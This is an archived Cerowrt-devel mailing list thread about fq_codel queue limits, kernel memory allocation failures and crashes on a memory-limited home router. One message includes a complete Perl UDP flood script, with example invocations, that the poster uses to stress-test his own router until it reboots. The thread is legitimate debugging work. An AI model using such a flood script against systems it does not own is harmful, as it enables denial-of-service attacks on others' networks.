[Cerowrt-devel] Coping with router memory limitations in fq_codel

Mon Aug 20 15:55:26 EDT 2012

Hi Dave,

sorry for accidentally taking this private, so here it is again.

On Aug 20, 2012, at 12:41 PM, Sebastian Moeller wrote:

> Hi Dave,
> 
> thanks for the long and thoughtful response.
> 
> 
> On Aug 20, 2012, at 12:12 PM, Dave Taht wrote:
> 
>> Dear Sebastian:
>> 
>> In addition to your udp flooding DoS attack, I attacked cero also by
>> using diffserv marking in netperf (-Y codepoint,codepoint) to saturate
>> all 4 wifi fq_codel queues, and also would get the router to have
>> memory allocation failures and ultimately crash in the same way you
>> are crashing it. I can similarly do what you just did with rtp
>> flooding. You are correct that codel is tuned for tcp, and that
>> fq_codel by maintaining many queues is even more susceptible to a
>> tuned udp flooding attack on a memory limited device such as this.
> 
> 	Ah, I did not think that I reported something new in regards to crash the router, it was more about me having found a way to reproduce it without netsurf/iperf (which I never really got to run, due to a lack of endpoints) as well as without using http://broadband.mpi-sws.org/residential/ (as this only allows around 5 runs per 24hour period).
> 
>> 
>> I tried to cope with this in 3.3.8-10/11 by reducing the packet
>> limits, which helped a lot. Unfortunately the settings I used then
>> were below codel's reaction time, which invoked "interesting" tail
>> drop behavior, so I arbitrarily doubled them in -17. To invoke more of
>> the kind of problems you are encountering…
> 
> 	That would be limit 600? Is 600 a problem for a single flow, or die to limit being for the sum of all flows? Would an additional per flow limit be able to help deal with this issue?
> 
>> 
>> 0) Since then I have been looking into ways to improve codel's
>> reaction time that are in the ns2 model presently, also fixing an
>> assumption about newton's method that didn't hold in reverse, and also
>> means to incorporate more aggressive codel behavior when queue limits
>> are near to being exceeded.
> 
> 	I see ramping up the drop frequency once space gets tight...
> 
>> 
>> Unfortunately as the memory pressure problem starts in the driver,
>> it's not communicated up the stack to where it could be controlled
>> better…
> 
> 	Argh, sounds like fun :)
> 
>> 
>> 0) I would like avoid having to determining if a queue is tcp or
>> "other", and then having different kinds of drop strategies for each.
>> That said, it seems possible to implement that…
> 
> 	Since the flows are filled by hash, a flow might contain both, correct? So being more firm in non-tcp containg flows, might hurt some TCP in shared bins.
> 
>> 
>> 1) A workaround of sorts for the 64MB 3700v2 has been to give up on
>> named and get some memory back that way.
> 
> 	Since I am a layman, what is the quick and dirty (and reversible) way to do so, so I can test this?
> 
>> 
>> 2) I believe, but am not sure, that Linux 3.6(5?) has some stuff in it
>> to get skb memory allocations done more efficiently. Eric and I and
>> felix had talked about it, I don't know what was implemented.
> 
> 	ISTR there was something about fixing the accounting of drivers so they track all buffers and not just part of the payload (truesize was the word). Which totally went over my head, but sounds like something that might help...
> 
>> 
>> 3) It may be possible to improve how the memory allocations from the
>> 2048 slab work in general. I imagine that half of memory is being
>> wasted on big packets otherwise.
> 
> 	I had a quick look at the SLUB documentation and see no way to do so I can understand.
> 
>> 
>> 4) some options for improving fq_codel for more memory constrained
>> home environments better.
>> 
>> 4a) On the wifi front (as well as other devices with multiple hardware
>> queues), I envision something like "mfq_codel", which would have an
>> overall similar packet limit to a single fq_codel, but be able to
>> deliver (and fair queue) packets to the underlying hardware queues
>> independently.
> 
> 	Sounds like something to test I guess (but out of my league)
> 
>> 
>> 4b) On the home to-ISP gateway qos front, a rate limited (tbf)
>> mfq_codel with 2-4 queues would replace the complexity of hfsc or htb
>> with a default qdisc that "just worked" without any scripting. It
>> could be mildly more responsive (htb buffers up some data and has it's
>> own notion of time and quantums), thus cpu and memory usage would be
>> lower than htb + multiple fq_codel queues.
> 
> 	But I thought that being able to arbitrarily prioritize some traffic in a home router is a good thing; and that will require some hierarchical system and will bring along some complexity...
> 
> 
>> 
>> Getting something that scaled down to 10s of kbits and up to gigabits
>> would be hard, tho. HTB needs to be tuned when running lower or higher
>> than it's original operating range, presently, and that is where, in
>> part, the simple_qos.sh effort is "stuck".
> 
> 	Can't this not be divined from the configured up and downlink rates? Or are you thinking about dynamic changes in link-rates?
> 
>> 
>> 4c) Another thought would be to have a weighted packet (to handle
>> classification) oriented sfq codel or qfq_codel rather than separate
>> fq_codel queues that are each byte-aware... we have CPU to burn, but
>> not memory…
> 
> 	That I admit I do not understand.
> 
> Thanks a lot & best regards
> 	Sebastian
> 
>> 
>> On Mon, Aug 20, 2012 at 11:24 AM, Sebastian Moeller <moeller0 at gmx.de> wrote:
>>> Hi Dave,
>>> 
>>> so I went to play around with this a bit more. I turned to UDP flooding my cable modem through the router and this surely allows me to create enough load on the wndr3700v2 to cause the allocation errors and as a "bonus" also to drive the router to reboot (driven by the watchdog timer?). Here is the script I used over 5G wireless (from http://blog.ioshints.info/2008/03/udp-flood-in-perl.html)
>>> 
>>> #!/usr/bin/perl
>> 
>> It would be nice to have a C or lua version of this sort of test.
>> 
>>> ##############
>>> 
>>> # udp flood.
>>> ##############
>>> 
>>> use Socket;
>>> use strict;
>>> 
>>> if ($#ARGV != 3) {
>>> print "flood.pl <ip> <port> <size> <time>\n\n";
>>> print " port=0: use random ports\n";
>>> print " size=0: use random size between 64 and 1024\n";
>>> print " time=0: continuous flood\n";
>>> exit(1);
>>> }
>>> 
>>> my ($ip,$port,$size,$time) = @ARGV;
>>> 
>>> my ($iaddr,$endtime,$psize,$pport);
>>> 
>>> $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
>>> $endtime = time() + ($time ? $time : 1000000);
>>> 
>>> socket(flood, PF_INET, SOCK_DGRAM, 17);
>>> 
>>> 
>>> print "Flooding $ip " . ($port ? $port : "random") . " port with " .
>>> ($size ? "$size-byte" : "random size") . " packets" .
>>> ($time ? " for $time seconds" : "") . "\n";
>>> print "Break with Ctrl-C\n" unless $time;
>>> 
>>> for (;time() <= $endtime;) {
>>> $psize = $size ? $size : int(rand(1024-64)+64) ;
>>> $pport = $port ? $port : int(rand(65500))+1;
>>> 
>>> send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));}
>>> 
>>> called as either
>>> udp_flood.pl 192.168.100.1 0 1024 240
>>> or
>>> udp_flood.pl 192.168.100.1 32000 1024 240
>>> 
>>> The first version with randomized port number spreads the load nicely over many fq_codel bins/flows and seems slightly more likely to cause allocation errors and reboots than the 2nd invocation which restricts itself to port 32000 and presumably just one flow.
>>>       I wonder how to make cerowrt survive this kind of stress test…
>>> 
>>> best
>>>       Sebastian
>>> 
>>> 
>>> On Aug 15, 2012, at 9:08 PM, Dave Taht wrote:
>>> 
>>>> re: ath: skbuff alloc of size 1926 failed
>>>> 
>>>> as for the ath skbuff problem, I've seen that a lot. I had put hard
>>>> packet limits (~600) on fq_codel in -11 and prior that were too low
>>>> and it mostly went away, but I hit tail drop behavior everywhere,
>>>> instead of codel behavior. What I have now (typically 1200) may well
>>>> be too high, but not as overly high as the default (10k packets).
>>>> There may be another means of increasing the size of that slab pool or
>>>> making it less onerous.
>>>> 
>>>> I would like it if codel "kicked in" earlier than it currently does.
>>>> The code in ns2 is currently using half the period that the linux code
>>>> is. This would control things better, or so I hope (planning on trying
>>>> this as I get time)
>>>> 
>>>> I am also considering means of artificially upscaling the drop
>>>> scheduler when we get close to queue limits.
>>>> 
>>>> See some discussions on the codel list for these issues. (sims are
>>>> easier to deal with than cerowrt, too!)
>>>> 
>>>> as for bind, it should be automagically restarted from xinetd, no need
>>>> to fiddle with anything. However, since you are already under massive
>>>> memory pressure, it may well fail to start up that way, too. At the
>>>> moment, I've largely given up on bind on anything but a more core home
>>>> gw, and am running dnsmasq on everything (3700v2, picostations,
>>>> nanostations) but the 3800s. (and the ones I run it on, aren't being
>>>> used for wifi right now).
>>>> 
>>>> Lastly: Swap space won't help you on exhausting kernel limits.
>>>> 
>>>> I'm glad you can reproduce the ath: slab problem - I can get it too at
>>>> high rates using netperf over wifi. I will try a 3700v2 with and
>>>> without bind to see if it's still there in 3.3.8-17. In the meantime
>>>> if anyone knows how to get more allocations in that (2048? 4096?) slab
>>>> by default, perhaps that will help?
>>>> 
>>>> 
>>>> 
>>>> On Wed, Aug 15, 2012 at 10:23 AM, Sebastian Moeller <moeller0 at gmx.de> wrote:
>>>>> Hi Dave,
>>>>> 
>>>>> great work, as always I upgraded my production router to the latest and greatest (since I only have one router…). And it works quite well for normal usage…
>>>>> Netalyzr reports around 2800ms seconds of uplink buffering, yet saturating the uplink does not affect ping times to a remote target noticeably, basically the same as for all codellized ceo versions I tested so far...
>>>>> 
>>>>> Some notes and a question:
>>>>> I noticed that even given plenty of swap space (1GB on a usb stick), using http://broadband.mpi-sws.org/residential/ to exercise UDP stress (on the uplink I assume) I can easily produce (I run the test from a macosx via 5GHz wireless over 1.5 yards):
>>>>> Aug 15 01:16:29 nacktmulle kern.err kernel: [175395.132812] ath: skbuff alloc of size 1926 failed
>>>>> (and plenty of those…).
>>>>> What then happens is that the OOM killer will aim for bind (reasonable since it is the largest single process) and kill it. When I try to restart bind by:
>>>>> root at nacktmulle:~# /etc/rc.d/S47namedprep start
>>>>> root at nacktmulle:~# /etc/rc.d/S48named restart
>>>>> Stopping isc-bind
>>>>> /etc/chroot/named//var/run/named/named.pid not found, trying brute force
>>>>> killall: named: no process killed
>>>>> Kicking isc-bind in xinetd
>>>>> rndc: connect failed: 127.0.0.1#953: connection refused
>>>>> And bind does not start again and the router becomes less than useful. Now I assume I am doing something wrong, but what, if you have any idea how to solve this short of a reboot of the router (my current method) I would be happy to learn
>>>>> 
>>>>> 
>>>>> 
>>>>> best regards
>>>>>      sebastian
>>>>> 
>>>>> On Aug 12, 2012, at 11:08 PM, Dave Taht wrote:
>>>>> 
>>>>>> I'm too tired to write up a full set of release notes, but I've been
>>>>>> testing it all day,
>>>>>> and it looks better than -10 and certainly better than -11, but I won't know
>>>>>> until some more folk sit down and test it, so here it is.
>>>>>> 
>>>>>> http://huchra.bufferbloat.net/~cero1/3.3/3.3.8-17/
>>>>>> 
>>>>>> fresh merge with openwrt, fix to a bind CVE, fixes for 6in4 and quagga
>>>>>> routing problems,
>>>>>> and a few tweaks to fq_codel setup that might make voip better.
>>>>>> 
>>>>>> Go forth and break things!
>>>>>> 
>>>>>> In other news:
>>>>>> 
>>>>>> Van Jacobson gave a great talk about bufferbloat, BQL, codel, and fq_codel
>>>>>> at last week's ietf meeting. Well worth watching. At the end he outlines
>>>>>> the deployment problems in particular.
>>>>>> 
>>>>>> http://recordings.conf.meetecho.com/Recordings/watch.jsp?recording=IETF84_TSVAREA&chapter=part_3
>>>>>> 
>>>>>> Far more interesting than this email!
>>>>>> 
>>>>>> 
>>>>>> --
>>>>>> Dave Täht
>>>>>> http://www.bufferbloat.net/projects/cerowrt/wiki - "3.3.8-17 is out
>>>>>> with fq_codel!"
>>>>>> _______________________________________________
>>>>>> Cerowrt-devel mailing list
>>>>>> Cerowrt-devel at lists.bufferbloat.net
>>>>>> https://lists.bufferbloat.net/listinfo/cerowrt-devel
>>>>> 
>>>> 
>>>> 
>>>> 
>>>> --
>>>> Dave Täht
>>>> http://www.bufferbloat.net/projects/cerowrt/wiki - "3.3.8-17 is out
>>>> with fq_codel!"
>>> 
>> 
>> 
>> 
>> -- 
>> Dave Täht
>> http://www.bufferbloat.net/projects/cerowrt/wiki - "3.3.8-17 is out
>> with fq_codel!"
>